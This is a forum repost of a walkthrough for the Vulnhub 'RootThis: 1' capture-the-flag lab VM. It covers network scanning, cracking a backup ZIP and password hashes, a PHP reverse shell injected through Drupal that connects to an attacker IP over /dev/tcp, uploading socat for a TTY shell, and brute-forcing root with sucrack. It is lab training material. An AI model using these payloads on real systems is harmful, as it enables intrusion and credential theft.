• We just launched and are currently in beta. Join us as we build and grow the community.

Vulnhub: RootThis: 1 Walkthrough

bonestherapper

Product Launch Expert
B
B Rep
0
0
0
Rep
0
B Vouches
0
0
0
Vouches
0
Posts
108
Likes
169
Bits
0
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1 200 XP
Hello friends! Today we are going to take another boot2root challenge known asroot this. The credit for making this VM machine goes to “FredWemeijer” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download this VM here.

Security Level: Intermediate

Flags: There is one flag (flag.txt).

Penetrating Methodology:
  • IP Discovery using netdiscover
  • Network scanning (Nmap)
  • Surfing HTTP service port (80)
  • Directory enumeration using dirb
  • Getting Backup file using wget
  • Cracking password usingfcrackzip
  • Cracking Hashes using John the Ripper
  • Getting Reverse Shell
  • Getting a proper TTY shell using socat
  • Cracking root password usingsucrack
  • Retrieving flag

Walkthrough

Let’s start off with scanning the network to find our target.

Code: 
netdiscover

1.png


We found our target –> 192.168.1.135

Our next step is to scan our target with nmap.

Code: 
nmap -p- -A 192.168.1.135

2.png


The NMAP output shows us that there is only 1 port open: 80(HTTP)

We find that port 80 is running http, so we open the IP in our browser.

3.png


We don’t find anything on the webpage, so we use dirb to enumerate the directories on the web server.

Code: 
dirb http://192.168.1.135/

4.png


We find two interesting directories called “backup” and “drupal”. We open the “/drupal” directory and find a Drupal CMS login page. We are unable tologinor find any vulnerability on the CMS.

5.png


We try to openthe “backup/” directory and find that it is a file. So we use “wget” to download the file on our system. After downloading the file, we find that is a ZIP file. When we tried to extract it we are prompted for a password. To bruteforce, the password protected file we can use a tool called “fcrackzip”. After getting the password for the ZIP file we extract the data and find a SQL file.

Code: 
wget http://192.168.1.135/backup
file backup
frackzip -D -v -u -p /usr/share/wordlists/rockyou.txt backup
unzip backup
cat dump.sql

6.png


Searching throughthe contentof the SQL file, we find 2 usernames and their password hashes.

7.png


We save the hashes in a file and then use john the ripper to crack the hashes. We are successfully able to crack the hash and get the password for the user “webman”.

Code: 
john hashes --wordlist=/usr/share/wordlists/rockyou.txt

8.png


We use the credentials “webman:moranguita” tologinthrough Drupal CMS and are successfully able tologin.

9.png


To get a reverse shell of the target system, we go to add content and add the following php code to get a revere shell:

Code: 
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.107/1234 0>&1'");

11.png


Weset upour listener and as soon as we click on save on the CMS we get a reverse shell. Enumerating the target system; inside “/home/user” directory we find a file called “MessageToRoot.txt”. We open the file and find it hashintedthat the root password is inside the first 300 words of the rockyou.txt. We try to “su” command and find that we don’t have a proper TTY shell to run the command.

12.png
We tried multiple ways to get a TTY shell, but are unable to spawn one withan availableapplication on the target machine. So we upload socat on the target machine to get a TTY shell. (Download socat from here)

Code: 
wget http://192.168.1.107/socat
./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.107:4567

13.png


We start a listener on our localsystemand are able to get a reverse shell. We run “su” command and find that we are able to spawn a TTY shell.

14.png


Now we create a dictionary with the first 300 words of rockyou.txt.

Code: 
head -n 300 /usr/share/wordlists/rockyou.txt > dict.txt

15.1.png


Now as there is SSH running on the target machine, we cannot brute force the username and password.Instead, we can use a tool called “sucrack” that brute forces password locally through “su”. We download it in our system and extract it. Then we compile the application on our system asitis not C-compiler on the target machine. After compiling the application, we archive the compiled application to upload it on the target machine. (You can find more information aboutsucrackand downloadsucrackfrom here)

Code: 
tar -xvf sucrack-1.2.3.tar.gz
cd sucrack-1.2.3/
./configure
make
tar -cvf sucrack.tar sucrack-1.2.3/

15.png


We upload the dictionary file and the compiled application on the target system. We first start our python HTTP server using “SimpleHTTPServer” module and then use “wget” command on the target machine to download it from our local system. After downloading both the files we extracted the tar file.

Code: 
wget http://192.168.1.107/sucrack.tar
tar xvf sucrack.tar

16.png


After extracting the tar file, we go to “sucrack1-2.3/src” directory as the compiled application is inside this directory and run the command to brute force the password. The application was successfully able to brute force the password for root user. We switched to root user and inside /root directory and we successfully able to get the flag.

Code: 
./sucrack -u root -w 10 /tmp/dict.txt

17.png


Author: Sushma Ahuja is a Technical Writer, Researcher, and Penetration Tester. Can be Contacted on LinkedIn
 
You must log in or register to reply here.

452,292

323,526

323,535

R rathi
Top